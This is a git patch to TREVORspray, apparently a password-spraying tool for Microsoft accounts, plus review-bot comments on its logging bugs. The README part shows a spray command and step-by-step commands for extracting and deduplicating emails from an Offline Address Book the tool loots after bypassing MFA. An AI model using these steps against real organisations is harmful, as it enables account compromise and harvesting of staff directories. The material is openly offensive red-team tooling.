From 7e61724632e21dc996460d51ac3f277367a39c48 Mon Sep 17 00:00:00 2001
From: TheTechromancer
Date: Wed, 19 Jan 2022 14:16:30 -0500
Subject: [PATCH] fixed bug retrieving LZX files, updated README
---
 README.md | 18 ++++++++++++++++++
 trevorspray/lib/looters/msol.py | 3 ++-
 trevorspray/lib/util.py | 2 ++
 3 files changed, 22 insertions(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 00dd953..2bac7d9 100644
--- a/README.md
+++ b/README.md
@@ -94,6 +94,24 @@ done | tee f.last.txt
 trevorspray -u f.last.txt -p 'Fall2021!'
 ```
+## Extract data from downloaded LZX files
+When TREVORspray successfully bypasses MFA and retrieves an Offline Address Book (OAB), the address book is downloaded in LZX format to `~/.trevorspray/loot`. LZX is an ancient and obnoxious encryption algorithm used by Microsoft.
+~~~bash
+# get libmspack (for extracting LZX file)
+git clone https://github.com/kyz/libmspack
+cd libmspack/libmspack/
+./rebuild.sh
+./configure
+make
+ # extract LZX file
+./examples/.libs/oabextract ~/.trevorspray/loot/deadbeef-ce01-4ec9-9d08-1050bdc41131-data-1.lzx oab.bin
+# extract all strings
+strings oab.bin
+# extract and dedupe emails
+egrep -oa '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}' oab.bin | tr '[:upper:]' '[:lower:]' | sort -u
+~~~
+
 ## TREVORspray - Help:
 ```
 $ trevorspray --help
diff --git a/trevorspray/lib/looters/msol.py b/trevorspray/lib/looters/msol.py
index 1c44178..b67dc5c 100644
--- a/trevorspray/lib/looters/msol.py
+++ b/trevorspray/lib/looters/msol.py
@@ -277,9 +277,10 @@ def test_autodiscover(self, username, password):
 lzx_file = self.loot_dir / lzx_url.split('/')[-1]
 log.success(f'Downloading LZX for {username} to {lzx_file}')
 try:
- download_file(url, str(lzx_file), verify=False, auth=auth)
+ download_file(lzx_url, str(lzx_file), verify=False, auth=auth)
 except Exception as e:
 log.warning(f'Failed to retrieve LZX file at {lzx_url}')
+ log.success('Successfully downloaded LZX file. See README for instructions on how to extract data.')
 else:
 log.warning(f'No LZX link found for {username}')
diff --git a/trevorspray/lib/util.py b/trevorspray/lib/util.py
index 162e112..91eb9cc 100644
--- a/trevorspray/lib/util.py
+++ b/trevorspray/lib/util.py
@@ -128,7 +128,9 @@ def is_url(d):
 def download_file(url, filename, **kwargs):
+ log.debug(f'Downloading file from {url} to (unknown), {kwargs}')
 with requests.get(url, stream=True, **kwargs) as response:
+ log.debug(f'Download result: HTTP {response.status_code}, Size: {len(response.text)}')
 response.raise_for_status()
 with open(filename, 'wb') as f:
 for chunk in response.iter_content(chunk_size=8192):
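Review bot: The added `log.success('Successfully downloaded LZX file. ...')` is placed after the `except Exception as e:` branch rather than on the success path, so when `download_file` raises, the "Failed to retrieve" warning is immediately followed by a success message for a file that was never written (indentation is flattened in this rendering, but the statement order gives the same result whether the line sits inside the except body or after the try/except). Moving it under a `try`/`else:` clause keeps it on the success path only: `else:` followed by `log.success('Successfully downloaded LZX file. See README for instructions on how to extract data.')`. The except branch also binds `e` without using it; `log.warning(f'Failed to retrieve LZX file at {lzx_url}: {e}')` would tell the operator why the download failed. The enclosing `test_autodiscover` begins above the hunk.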
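Review bot: `{kwargs}` in the new `log.debug(f'Downloading file from {url} to (unknown), {kwargs}')` writes every keyword argument to the log, and the msol.py hunk in this same commit passes `auth=auth` through those kwargs, so if `auth` is a `(user, password)` tuple the password lands in the debug log. The message also prints the literal `(unknown)` where `filename` is already available. The second added line evaluates `response.text` on a `stream=True` response, which reads and decodes the entire body into memory before `raise_for_status()` runs and defeats the chunked `iter_content` write below. Suggested replacements: `log.debug(f'Downloading file from {url} to {filename}')` and `log.debug(f'Download result: HTTP {response.status_code}, Content-Length: {response.headers.get("Content-Length")}')`. `download_file` continues below the hunk.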